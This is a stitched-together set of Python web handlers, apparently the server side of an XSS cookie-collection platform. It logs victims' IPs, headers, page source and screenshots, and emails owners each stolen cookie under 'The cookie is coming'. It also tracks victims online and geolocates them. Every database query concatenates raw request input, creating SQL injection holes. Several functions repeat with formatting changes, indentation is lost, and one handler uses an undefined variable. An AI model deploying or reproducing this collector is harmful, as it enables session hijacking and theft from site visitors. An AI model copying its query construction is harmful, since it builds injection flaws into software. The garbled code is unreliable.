def post(self, id, do):
if id:
row=db.ct("module", "*", "id="+id)
if row:
description = urlen(self.get_argument('description', 'None'))
name = urlen(self.get_argument('name', 'None'))
code = urlen(self.get_argument('code', 'None'))
addtime = int(time.time())
db.u(
"module",
"description='"+description+"',name='"+name+"',code='"+code+"',addtime="+str(addtime), "id="+id)
self.redirect("http://"+URL+"/module")
else:
self.render('404.html')
else:
if do == 'add':
description = urlen(self.get_argument('description', 'None'))
name = urlen(self.get_argument('name', 'None'))
code = urlen(self.get_argument('code', 'None'))
addtime = int(time.time())
db.i(
"module",
"description,name,code,addtime",
"'"+description+"','"+name+"','"+code+"','"+str(addtime)+"'")
self.redirect("http://"+URL+"/module")
elif do == 'del':
db.d("module", "id in ("+self.get_argument('id')+")")
else:
self.render('404.html')
def on_close(self):
self.participants.remove(self)
if self.name != 'manager':
hostip = base.BaseTransportMixin.sock_headers['Remote-Ip']
hostid = db.ct('host', 'id', "hostip='" + ip +
"' order by id desc limit 1")['id']
db.u("host", "online=0", "id=" + str(hostid))
def post(self, id, do):
if id:
row = db.ct("module", "*", "id=" + id)
if row:
description = urlen(self.get_argument('description', 'None'))
name = urlen(self.get_argument('name', 'None'))
code = urlen(self.get_argument('code', 'None'))
addtime = int(time.time())
db.u(
"module", "description='" + description + "',name='" +
name + "',code='" + code + "',addtime=" + str(addtime),
"id=" + id)
self.redirect("http://" + URL + "/module")
else:
self.render('404.html')
else:
if do == 'add':
description = urlen(self.get_argument('description', 'None'))
name = urlen(self.get_argument('name', 'None'))
code = urlen(self.get_argument('code', 'None'))
addtime = int(time.time())
db.i(
"module", "description,name,code,addtime",
"'" + description + "','" + name + "','" + code + "','" +
str(addtime) + "'")
self.redirect("http://" + URL + "/module")
elif do == 'del':
db.d("module", "id in (" + self.get_argument('id') + ")")
else:
self.render('404.html')
def get(self, projectid, ip, page, do):
def getname(id):
return urlde(db.ct("project", "name", "id=" + id)['name'])
if ip and projectid:
num = db.c('host',
"hostip='" + ip + "' and projectid='" + projectid + "'")
if num:
page = str(page and
(int(page) - 1 > 0 and
(int(page) - 1 < num and int(page) - 1 or 0) or 0)
or 0)
host = db.ct(
"host", "*", "hostip = '" + ip + "' and projectid='" +
projectid + "' order by id desc limit " + page + ",1")
if do == 'del':
db.d("host", "id=" + str(host['id']))
if num == 1:
hostlist = json.loads(
db.ct("project", "hosts",
"id=" + projectid)['hosts'])
hostlist.remove(ip)
db.u("project", "hosts='" + json.dumps(hostlist) + "'",
"id=" + projectid)
self.redirect("http://" + URL + "/project/" +
projectid)
self.redirect("http://" + URL + "/host/" + projectid +
"/" + ip)
else:
self.render(
"host.html",
heads=[
{
'name': getname(projectid),
'title': 'Go to ' + getname(projectid),
'url': 'project/' + projectid
},
{
'name': ip,
'title': '',
'url': ''
},
],
username=self.get_secure_cookie("username"),
datainfo=db.datainfo(),
systeminfo=systeminfo(),
urlde=urlde,
timede=timede,
url=URL,
urljson=urljson,
host=host,
num=range(num),
page=int(page) + 1,
)
else:
self.render('404.html')
else:
self.render('404.html')
def post(self, id, do):
if id:
if do == 'del':
hostip = self.get_argument('hostip').split(',')
hostlist = json.loads(db.ct("project","hosts","id="+id)['hosts'])
hostips = ''
for x in hostip:
hostlist.remove(x)
hostips += "'"+x+"',"
print hostlist,hostips
db.u("project", "hosts='"+json.dumps(hostlist)+"'", "id="+id)
db.d("host", "hostip in ("+hostips[:-1]+") and projectid="+id)
else:
row = db.ct("project", "*", "id="+id)
if row:
post_data = {}
for key in self.request.arguments:
post_data[key] = self.get_arguments(key)
i = 0
module = {}
if 'moduleid' in post_data:
for key in post_data['moduleid']:
module[key] = urlen(post_data['modulecustom'][i])
i += 1
module = json.dumps(module)
else:
module = '[]'
addtime = int(time.time())
db.u(
"project",
"name='"+urlen(post_data['name'][0])+"',description='"+urlen(post_data['description'][0])+"',email='"+post_data['email'][0]+
"',custom='"+urlen(post_data['custom'][0])+"',fip='"+post_data['fip'][0]+"',furl='"+post_data['furl'][0]+"',status='"+post_data['status'][0]+
"',module='"+module+"',addtime="+str(addtime), "id="+id)
self.redirect("http://"+URL+"/project")
else:
self.render('404.html')
else:
if do == 'add':
post_data = {}
for key in self.request.arguments:
post_data[key] = self.get_arguments(key)
i = 0
module = {}
if 'moduleid' in post_data:
for key in post_data['moduleid']:
module[key]=urlen(post_data['modulecustom'][i])
i += 1
module = json.dumps(module)
else:
module = '[]'
addtime = int(time.time())
db.i(
"project","name,description,email,custom,fip,furl,status,hosts,module,addtime","'"+urlen(post_data['name'][0])+"','"+
urlen(post_data['description'][0])+"','"+post_data['email'][0]+"','"+urlen(post_data['custom'][0])+"','"+post_data['fip'][0]+"','"+
post_data['furl'][0]+"','"+post_data['status'][0]+"','[]','"+module+"','"+str(addtime)+"'")
self.redirect("http://"+URL+"/project")
elif do == 'del':
db.d("project", "id in ("+self.get_argument('id')+")")
def on_open(self, info):
username = base.BaseTransportMixin.sock_cookies
row = db.ct("manager", "*", "username='******'")
if row:
self.name = 'manager'
else:
hostip = base.BaseTransportMixin.sock_headers['Remote-Ip']
hostid = db.ct('host', 'id', "hostip='"+hostip+"' order by id desc limit 1")['id']
db.u("host", "online=1", "id="+str(hostid))
self.name = hostip
self.participants.add(self)
def on_open(self, info):
username = base.BaseTransportMixin.sock_cookies
row = db.ct("manager", "*", "username='******'")
if row:
self.name = 'manager'
else:
hostip = base.BaseTransportMixin.sock_headers['Remote-Ip']
hostid = db.ct('host', 'id', "hostip='" + hostip +
"' order by id desc limit 1")['id']
db.u("host", "online=1", "id=" + str(hostid))
self.name = hostip
self.participants.add(self)
def getaddr(ip):
url = 'http://ip.taobao.com/service/getIpInfo.php?ip='+ip
req = urllib2.Request(url)
res_data = None
while res_data == None:
try:
res_data = urllib2.urlopen(req).read()
except:
pass
res_data = json.loads(res_data)
addr = '-'.join((res_data['data']['country'],res_data['data']['region'],res_data['data']['city'],res_data['data']['county'],res_data['data']['isp']))
db.u('host',"addr = '"+addr + "'","hostip='"+ip+"'")
return addr
def get(self, projectid, ip, page, do):
def getname(id):
return urlde(db.ct("project", "name", "id=" + id)["name"])
if ip and projectid:
num = db.c("host", "hostip='" + ip + "' and projectid='" + projectid + "'")
if num:
page = str(page and (int(page) - 1 > 0 and (int(page) - 1 < num and int(page) - 1 or 0) or 0) or 0)
host = db.ct(
"host",
"*",
"hostip = '" + ip + "' and projectid='" + projectid + "' order by id desc limit " + page + ",1",
)
if do == "del":
db.d("host", "id=" + str(host["id"]))
if num == 1:
hostlist = json.loads(db.ct("project", "hosts", "id=" + projectid)["hosts"])
hostlist.remove(ip)
db.u("project", "hosts='" + json.dumps(hostlist) + "'", "id=" + projectid)
self.redirect("http://" + URL + "/project/" + projectid)
self.redirect("http://" + URL + "/host/" + projectid + "/" + ip)
else:
self.render(
"host.html",
heads=[
{
"name": getname(projectid),
"title": "Go to " + getname(projectid),
"url": "project/" + projectid,
},
{"name": ip, "title": "", "url": ""},
],
username=self.get_secure_cookie("username"),
datainfo=db.datainfo(),
urlde=urlde,
timede=timede,
url=URL,
urljson=urljson,
host=host,
num=range(num),
page=int(page) + 1,
)
else:
self.render("404.html")
else:
self.render("404.html")
def get(self, projectid, ip, page, do):
def getname(id):
return urlde(db.ct("project","name","id="+id)['name'])
if ip and projectid:
num = db.c('host', "hostip='"+ip+"' and projectid='"+projectid+"'")
if num:
page = str(page and (int(page)-1>0 and (int(page)-1<num and int(page)-1 or 0) or 0) or 0)
host = db.ct(
"host",
"*",
"hostip = '"+ip+"' and projectid='"+projectid+"' order by id desc limit "+page+",1")
if do == 'del':
db.d("host", "id="+str(host['id']))
if num == 1:
hostlist = json.loads(db.ct("project", "hosts", "id="+projectid)['hosts'])
hostlist.remove(ip)
db.u("project", "hosts='"+json.dumps(hostlist)+"'", "id="+projectid)
self.redirect("http://"+URL+"/project/"+projectid)
self.redirect("http://"+URL+"/host/"+projectid+"/"+ip)
else:
self.render(
"host.html",
heads=[
{'name':getname(projectid), 'title': 'Go to ' + getname(projectid),
'url': 'project/'+projectid},
{'name': ip, 'title': '', 'url': ''},
],
username=self.get_secure_cookie("username"),
datainfo=db.datainfo(),
systeminfo=systeminfo(),
urlde=urlde,
timede=timede,
url=URL,
urljson=urljson,
host=host,
num=range(num),
page=int(page)+1,
)
else:
self.render('404.html')
else:
self.render('404.html')
def post(self, id, do):
def getname(id):
return urlde(db.ct("project", "name", "id="+str(id))['name'])
hostip = self.request.headers['Remote-Ip']
information = self.get_argument('information', 'None')
sourcecode = self.get_argument('code', 'None')
screen = self.get_argument('screen', 'None')
receive = self.get_argument('receive', 'None')
if not information == 'None':
addtime = int(time.time())
request = self.request.headers
headers = {
'user-agent': urlen('user-agent' in request and request['user-agent'] or 'None'),
'Accept-Language': urlen('Accept-Language' in request and request['Accept-Language'] or 'None'),
'X-Forwarded-For': urlen('X-Forwarded-For' in request and request['X-Forwarded-For'] or 'None'),
'Referer': urlen('Referer' in request and request['Referer'] or 'None'),
}
headers = json.dumps(headers)
db.i(
'host',
'hostip,information,headers,projectid,addtime',
"'"+hostip+"','"+urlen(information)+"','"+headers+"','"+id+"','"+str(addtime)+"'")
hosts = json.loads(db.ct('project', "hosts", "id="+id)['hosts'])
hosts.append(hostip)
db.u("project", "hosts='"+json.dumps(list(set(hosts)))+"'", "id="+id)
emails = urlde(db.ct("project", "email", "id=" + id)['email']).split(";")
information = json.loads(information)
print information
for email in emails:
text = 'location : ' + information['location'] + "<p>" +"cookie : " + information['cookie']
sendmail(email,'The cookie is coming ['+hostip+']', '<h1>project: '+ getname(id) + "</h1><p>" + text)
hostid = db.ct('host', 'id', "hostip='"+hostip+"' order by id desc limit 1")['id']
if not sourcecode == 'None':
db.u('host', "sourcecode='"+urlen(sourcecode)+"'", 'id='+str(hostid))
if not screen == 'None':
db.u('host', "screen='"+urlen(screen)+"'", 'id='+str(hostid))
if not receive == 'None':
oldreceive = urlde(db.ct(
'host',
'receive',
'id='+str(hostid))['receive'] and db.ct('host', 'receive', 'id='+str(hostid))['receive'] or '')
oldreceive = oldreceive and json.loads(oldreceive) or oldreceive
if oldreceive:
receive = json.loads(receive)
for key in oldreceive:
receive[key] = oldreceive[key]
receive = json.dumps(receive)
db.u('host', "receive='"+urlen(receive)+"'", 'id='+str(hostid))
x=db.cts("host", "*", "projectid=5")
self.write(json.dumps(x))
def post(self, id, do):
def getname(id):
return urlde(db.ct("project", "name", "id="+str(id))['name'])
hostip = self.request.remote_ip
information = self.get_argument('information', 'None')
sourcecode = self.get_argument('code', 'None')
screen = self.get_argument('screen', 'None')
receive = self.get_argument('receive', 'None')
if not information == 'None':
addtime = int(time.time())
request = self.request.headers
headers = {
'user-agent': urlen('user-agent' in request and request['user-agent'] or 'None'),
'Accept-Language': urlen('Accept-Language' in request and request['Accept-Language'] or 'None'),
'X-Forwarded-For': urlen('X-Forwarded-For' in request and request['X-Forwarded-For'] or 'None'),
'Referer': urlen('Referer' in request and request['Referer'] or 'None'),
}
headers = json.dumps(headers)
db.i(
'host',
'hostip,information,headers,projectid,addtime',
"'"+hostip+"','"+urlen(information)+"','"+headers+"','"+id+"','"+str(addtime)+"'")
hosts = json.loads(db.ct('project', "hosts", "id="+id)['hosts'])
hosts.append(hostip)
db.u("project", "hosts='"+json.dumps(list(set(hosts)))+"'", "id="+id)
emails = urlde(db.ct("project", "email", "id=" + id)['email']).split(";")
information = json.loads(information)
print information
for email in emails:
text = 'location : ' + information['location'] + "<p>" +"cookie : " + information['cookie']
hostid = db.ct('host', 'id', "hostip='"+hostip+"' order by id desc limit 1")['id']
if not sourcecode == 'None':
db.u('host', "sourcecode='"+urlen(sourcecode)+"'", 'id='+str(hostid))
if not screen == 'None':
db.u('host', "screen='"+urlen(screen)+"'", 'id='+str(hostid))
if not receive == 'None':
oldreceive = urlde(db.ct(
'host',
'receive',
'id='+str(hostid))['receive'] and db.ct('host', 'receive', 'id='+str(hostid))['receive'] or '')
oldreceive = oldreceive and json.loads(oldreceive) or oldreceive
if oldreceive:
receive = json.loads(receive)
for key in oldreceive:
receive[key] = oldreceive[key]
receive = json.dumps(receive)
db.u('host', "receive='"+urlen(receive)+"'", 'id='+str(hostid))
x=db.cts("host", "*", "projectid=5")
self.write(json.dumps(x))
def post(self, id, do):
if id:
if do == "del":
hostip = self.get_argument("hostip").split(",")
hostlist = json.loads(db.ct("project", "hosts", "id=" + id)["hosts"])
for x in hostip:
hostlist.remove(x)
hostips = "'" + x + "',"
db.u("project", "hosts='" + json.dumps(hostlist) + "'", "id=" + id)
db.d("host", "hostip in (" + hostips[:-1] + ") and projectid=" + id)
else:
row = db.ct("project", "*", "id=" + id)
if row:
post_data = {}
for key in self.request.arguments:
post_data[key] = self.get_arguments(key)
i = 0
module = {}
if "moduleid" in post_data:
for key in post_data["moduleid"]:
module[key] = urlen(post_data["modulecustom"][i])
i += 1
module = json.dumps(module)
else:
module = "[]"
addtime = int(time.time())
db.u(
"project",
"name='"
+ urlen(post_data["name"][0])
+ "',description='"
+ urlen(post_data["description"][0])
+ "',email='"
+ post_data["email"][0]
+ "',custom='"
+ urlen(post_data["custom"][0])
+ "',fip='"
+ post_data["fip"][0]
+ "',furl='"
+ post_data["furl"][0]
+ "',status='"
+ post_data["status"][0]
+ "',module='"
+ module
+ "',addtime="
+ str(addtime),
"id=" + id,
)
self.redirect("http://" + URL + "/project")
else:
self.render("404.html")
else:
if do == "add":
post_data = {}
for key in self.request.arguments:
post_data[key] = self.get_arguments(key)
i = 0
module = {}
if "moduleid" in post_data:
for key in post_data["moduleid"]:
module[key] = urlen(post_data["modulecustom"][i])
i += 1
module = json.dumps(module)
else:
module = "[]"
addtime = int(time.time())
db.i(
"project",
"name,description,email,custom,fip,furl,status,hosts,module,addtime",
"'"
+ urlen(post_data["name"][0])
+ "','"
+ urlen(post_data["description"][0])
+ "','"
+ post_data["email"][0]
+ "','"
+ urlen(post_data["custom"][0])
+ "','"
+ post_data["fip"][0]
+ "','"
+ post_data["furl"][0]
+ "','"
+ post_data["status"][0]
+ "','[]','"
+ module
+ "','"
+ str(addtime)
+ "'",
)
self.redirect("http://" + URL + "/project")
elif do == "del":
db.d("project", "id in (" + self.get_argument("id") + ")")
def on_close(self):
self.participants.remove(self)
if self.name != 'manager':
hostip = base.BaseTransportMixin.sock_headers['Remote-Ip']
hostid = db.ct('host', 'id', "hostip='"+ip+"' order by id desc limit 1")['id']
db.u("host", "online=0", "id="+str(hostid))
def post(self, id, do):
if id:
if do == 'del':
hostip = self.get_argument('hostip').split(',')
hostlist = json.loads(
db.ct("project", "hosts", "id=" + id)['hosts'])
for x in hostip:
hostlist.remove(x)
hostips = "'" + x + "',"
db.u("project", "hosts='" + json.dumps(hostlist) + "'",
"id=" + id)
db.d("host",
"hostip in (" + hostips[:-1] + ") and projectid=" + id)
else:
row = db.ct("project", "*", "id=" + id)
if row:
post_data = {}
for key in self.request.arguments:
post_data[key] = self.get_arguments(key)
i = 0
module = {}
if 'moduleid' in post_data:
for key in post_data['moduleid']:
module[key] = urlen(post_data['modulecustom'][i])
i += 1
module = json.dumps(module)
else:
module = '[]'
addtime = int(time.time())
db.u(
"project", "name='" + urlen(post_data['name'][0]) +
"',description='" +
urlen(post_data['description'][0]) + "',email='" +
post_data['email'][0] + "',custom='" +
urlen(post_data['custom'][0]) + "',fip='" +
post_data['fip'][0] + "',furl='" +
post_data['furl'][0] + "',status='" +
post_data['status'][0] + "',module='" + module +
"',addtime=" + str(addtime), "id=" + id)
self.redirect("http://" + URL + "/project")
else:
self.render('404.html')
else:
if do == 'add':
post_data = {}
for key in self.request.arguments:
post_data[key] = self.get_arguments(key)
i = 0
module = {}
if 'moduleid' in post_data:
for key in post_data['moduleid']:
module[key] = urlen(post_data['modulecustom'][i])
i += 1
module = json.dumps(module)
else:
module = '[]'
addtime = int(time.time())
db.i(
"project",
"name,description,email,custom,fip,furl,status,hosts,module,addtime",
"'" + urlen(post_data['name'][0]) + "','" +
urlen(post_data['description'][0]) + "','" +
post_data['email'][0] + "','" +
urlen(post_data['custom'][0]) + "','" +
post_data['fip'][0] + "','" + post_data['furl'][0] +
"','" + post_data['status'][0] + "','[]','" + module +
"','" + str(addtime) + "'")
self.redirect("http://" + URL + "/project")
elif do == 'del':
db.d("project", "id in (" + self.get_argument('id') + ")")